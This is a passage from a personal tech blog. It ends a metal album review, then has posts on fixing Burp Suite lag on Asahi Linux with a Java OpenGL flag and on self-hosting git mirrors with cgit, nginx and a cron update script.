If I had to bring some negativity, I'd say that Oli Peters' singing technique, while impressive, could use some more diction. If black metal bands like Bâ'a can manage to have understandable singing, odds are that so can other too. It's still completely insane how he manages to deliver lyrics at such high-speed nonetheless, and surprisingly for the genre, the lyrics are surprisingly good.

As a friend puts it, in this age of AI slop everywhere, given how fast and square Archspire is, it's the robots that should be afraid of being replaced.

Making Burp Suite snappy on Asahi Linux

2025-05-02T15:00:00+02:00

I've been using Asahi Linux for a couple of months now, and I'm pretty happy with it. There are of course some minor issues, mostly software not being available there, like Signal (thanks opensuse for providing builds). Today's papercut is Burp Suite being laggy and eating a worryingly high amount of CPU. chaos_princess suggested some workarounds for whatever Java application someone else wanted to run, and I thought it might have the same root cause.

Java supports OpenGL hardware acceleration since Java5, but for whatever reason that I'm too lazy to figure out, it's not enabled by default on Asahi. Just add -Dsun.java2d.opengl=True to the BurpSuitePro.vmoptions in your Burp installation folder, and you're good to go: Burp's interface shouldn't gobble a ridiculous amount of watts and by laggy anymore.

If you see some pink textures, you can add -Dsun.java2d.opengl.fbobject=false as well, to disable GL_EXT_framebuffer_object. Apparently, it "extension provides better performance for rendering and reduced VRAM consumption when using VolatileImages", but I haven't noticed a difference either way.

Mirroring my git repositories

2025-04-02T16:00:00+02:00

Since everything is going downhill on the internet, I spent some time mirroring some of my git repositories on a machine at home. I chose cgit for the interface, as everything else is fucking terrible at best. The deployment is trivial: install cgit and fastcgi, create a git user with /src/git as home, slap the following into your nginx configuration and you're good to go:

server {
    server_name git.dustri.org;
    root /usr/share/webapps/cgit;
    try_files $uri @cgit;

    location ~* ^.+\.(css|png|ico)$ {
        root /usr/share/webapps/cgit;
        expires 30d;
    }

    location @cgit {
        include fastcgi_params;
        fastcgi_param SCRIPT_FILENAME $document_root/cgit.cgi;
        fastcgi_param PATH_INFO $uri;
        fastcgi_param QUERY_STRING $args;
        fastcgi_pass unix:/var/run/fcgiwrap/fcgiwrap.sock;
    }
}

The configuration for cgit is also super-simple:

virtual-root=/
scan-path=/srv/git
clone-prefix=https://git.dustri.org
footer=""
section-from-path=1
repository-sort=age

I git clone'd the repositories I wanted to mirror into /srv/git via git clone --mirror …, and wrote a shell script to kept them updated:

#!/bin/sh

for dir in /srv/git/*/; do
    echo "[+] Updating $dir"
    git --git-dir="$dir" remote update
    touch -d "$(git --git-dir="$dir" --no-pager log -1 --format='%as')" "$dir/packed-refs"
done

As cgit is using packed-refs to determine the last time a git repository was updated, I set its modification date to the latest's commit one. Using --format=%ai would be better (ISO 8601), but busybox' touch doesn't support it, so %as (YYYY-MM-DD) has to suffice. The script is called via the git's user crontab every day.

For private repositories on github, I generated a per-repo personal access token and cloned each of them via git clone --mirror https://jvoisin:github_pat_…@github.com/jvoisin/my_secret_repo. Preventing them from being listed on the web interface is done by putting a cgitrc file with hide=1 or ignore=1 at their root depending of what you prefer.

You can see the result on git.dustri.org.